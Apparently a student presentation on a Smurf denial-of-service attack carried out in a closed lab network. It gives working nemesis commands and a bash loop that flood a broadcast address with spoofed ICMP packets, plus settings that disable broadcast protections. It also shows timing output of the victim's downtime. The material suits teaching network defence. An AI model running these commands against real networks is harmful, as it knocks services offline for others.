Smurf AttackFarhan Sajjad
OutlineSmurf Attack
What is a Smurf Attack?How is it Engineered?
Project 1Test EnvironmentConducting the AttackResults and Observations
ReferencesQuestions?
What is a Smurf Attack?Denial of Service Attack using spoofed
broadcast ping messages.
How is it Engineered?Essentially, by “spoofing” a broadcasted ICMP
Echo request with the victim’s IP address as the sender
The ICMP Header
Sample Spoofroot@jotilMove# nemesis icmp -v -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 08:00:27:29:4C:F0
ICMP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26) [MAC] 08:00:27:29:4C:F0 > FF:FF:FF:FF:FF:FF [Ethernet type] IP (0x0800) [IP] 192.168.0.5 > 192.168.0.255 [IP ID] 3121 [IP Proto] ICMP (1) [IP TTL] 255 [IP TOS] 0x00 [IP Frag offset] 0x0000 [IP Frag flags] [ICMP Type] Echo Request [ICMP Code] Echo Request [ICMP ID] 57730 [ICMP Seq number] 8233 Wrote 42 byte ICMP packet through linktype DLT_EN10MB. ICMP Packet Injected
The Test Environment
The Test Environment (continued)All the Linux machines had Wireshark installed on
themThe attacker had Nemesis installed on it, to generate
spoofed IP packetsThe victim had HTTP server on it, to check its
availabilityHad to turn on No-IP Directed Broadcast
Linux OS: root@jotilMove# echo "0" | cat > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
Cisco IOS: RouterC(config)#int f0/0RouterC(config-if)#ip directed-broadcast
Conducting the AttackCreated a small payload file of size 1472
bytesRan a small script at the attacking machine,
which looped to send spoofed ICMP packets#!/bin/bashi=10000while test $i != 0do
nemesis icmp -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 00:06:29:DF:2A:DA -P payload_fileecho "$i"i=`expr $i - 1`
done
Results
The Attacker’s Screenshot
The Victim’s Screenshot During Attack
The Victim’s Screenshot After Attack
The Observer’s Screenshot
root@hpgcpc06:/home/farhan# time wget 192.168.0.5--2009-11-13 20:49:45-- http://192.168.0.5/Connecting to 192.168.0.5:80... connected.HTTP request sent, awaiting response... 200 OKLength: 177 [text/html]Saving to: `index.html'
100%[======================================>] 177 --.-K/s in 0s
2009-11-13 20:49:45 (15.1 MB/s) - `index.html' saved [177/177]
real 0m0.008suser 0m0.004ssys 0m0.000sroot@hpgcpc06:/home/farhan# time wget 192.168.0.5--2009-11-13 20:50:03-- http://192.168.0.5/Connecting to 192.168.0.5:80... failed: Connection timed out.Retrying....--2009-11-13 20:59:36-- (try: 4) http://192.168.0.5/Connecting to 192.168.0.5:80... connected.HTTP request sent, awaiting response... 200 OKLength: 177 [text/html]Saving to: `index.html'
100%[======================================>] 177 --.-K/s in 0s
2009-11-13 20:59:36 (18.1 MB/s) - `index.html' saved [177/177]
real 9m33.041suser 0m0.008ssys 0m0.000s
ObservationsNumber of participating nodes crucial to the
effectiveness of the attackHardly effected the CPU or Memory utilization
of the Victim, however its network resources were overwhelmed and its services were unreachable
Networked devices after 1998 has turned off No-IP directed broadcasts, so it is difficult to conduct such attacks, however Smurf Amplifiers exists!
References[1] Smurf attack, from Wikipedia: http://en.wikipedia.org/wiki/Smurf_attack[2] smurf.c, [Online document] Available: http://personal.telefonica.terra.es/web/alexb/e/smurf.c[3] The Internet Control Message Protocol, from Wikipedia:
http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol[4] Ping, from Wikipedia: http://en.wikipedia.org/wiki/Ping[5] The ICMP Header. [Online document] Available: http://blog.csdn.net/xuhx/archive/2008/04/16/2297266.aspx[6] How a Broadcast Address Works. [Online document] Available:
http://learn-networking.com/network-design/how-a-broadcast-address-works[7] Denial-of-service attack, from Wikipedia: http://en.wikipedia.org/wiki/Denial-of-service_attack[8] Nemesis Packet Injection Tool Suite. [Online document] Available: http://nemesis.sourceforge.net/[9] Manpage of NEMESIS-ICMP. [Online document] Available:
http://nemesis.sourceforge.net/manpages/nemesis-icmp.1.html[10] Wireshark. [Online document] Available: http://www.wireshark.org/[11] Securing Cisco Routers with No IP Directed-Broadcast. [Online document] Available:
http://learn-networking.com/network-security/securing-cisco-routers-with-no-ip-directed-broadcast[12] Craig A. Hugen, The latest in denial of service attacks: "Smurfing". Description and information to minimize
effects. [Online document] Available: http://www.pentics.net/denial-of-service/white-papers/smurf.cgi[13] CERT® Advisory CA-1998-01 Smurf IP Denial-of-Service Attacks. [Online document] Available:
http://www.cert.org/advisories/CA-1998-01.html[14] Smurf Attack. [Online document] Available:
http://www.softpanorama.org/Net/Internet_layer/ICMP/smurf_attack.shtml[15] Smurf Amplifier Registry [Online document] Available: http://www.powertech.no/smurf/[16] Brian Hatch, Firewalling /proc entries [Online document] Available:
http://www.hackinglinuxexposed.com/articles/20021015.html[17] Todd Lammle, CCNA: Cisco Certified Network Associate Study Guide. ISBN: 978-0470110089. Publisher:
Sybex; 6 edition (August 29, 2007).
Questions?
Thank You!